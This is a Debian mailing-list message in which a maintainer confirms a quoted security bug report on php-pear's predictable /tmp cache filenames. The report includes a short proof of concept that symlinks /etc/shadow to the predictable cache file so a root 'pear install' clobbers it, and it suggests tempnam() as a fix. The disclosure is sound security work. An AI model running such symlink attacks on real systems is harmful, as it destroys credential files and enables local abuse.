[php-maint] Bug#759282: Bug#759282: [php-pear] "/tmp" symlink file clobbering
Ondřej Surý
ondrej at sury.org
Tue Aug 26 09:20:14 UTC 2014
Control: forcemerge -1 682157
Yes, it's a known bug that php-pear is not safe on multiuser systems.
Ondrej
On Mon, Aug 25, 2014, at 21:28, vladz wrote:
>
> Package: php-pear
> Version: 5.4.4-14+deb7u14
> Tags: security
>
> PEAR commands such as "pear install [...]" writes cache data into
> predictable filenames located in "/tmp/". Unprivileged local users
> could use symlinks to clobber arbitrary files.
>
> Temporary filenames ("$cachefile" and "$cacheidfile") are generated with
> the code above. They are predictable as far as we know the extension
> name that is going to be installed (this name is used to construct the
> url for the MD5 checksum):
>
> $ cat -n /usr/share/php/PEAR/REST.php
> [...]
> 59 $cachefile = $this->config->get('cache_dir') .
> DIRECTORY_SEPARATOR .
> 60 md5($url) . 'rest.cachefile';
> [...]
> 194 $cacheidfile = $this->config->get('cache_dir') .
> DIRECTORY_SEPARATOR .
> 195 md5($url) . 'rest.cacheid';
>
> For instance, when installing the "Mail_mime" extension, the following
> filenames are used by PEAR:
>
> - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile
> - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cacheid
>
> In this case, the "$url" used for md5 checksum is the following:
>
> $ printf "http://pear.php.net/rest/p/mail_mime/info.xml" | md5sum
> ff051dc5b96c95bf60e300d415b6c47e -
>
> To sum up, if a local user wants to clobber the "/etc/shadow" file, he
> runs:
>
> $ mkdir -p /tmp/pear/cache/
> $ ln -s /etc/shadow
> /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile
>
> Then when root runs PEAR, file gets clobbered:
>
> # pear install Mail_mime
> [...]
> # du -sk /etc/shadow
> 0 /etc/shadow
>
> A function like tempnam() could be use instead. It creates file with
> unique filename (see http://php.net/manual/en/function.tempnam.php).
>
> Regards,
> --
> http://vladz.devzero.fr
> PGP key 8F7E2D3C from pgp.mit.edu
>
> _______________________________________________
> pkg-php-maint mailing list
> pkg-php-maint at lists.alioth.debian.org
> http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-php-maint
--
Ondřej Surý <ondrej at sury.org>
Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server
More information about the pkg-php-maint
mailing list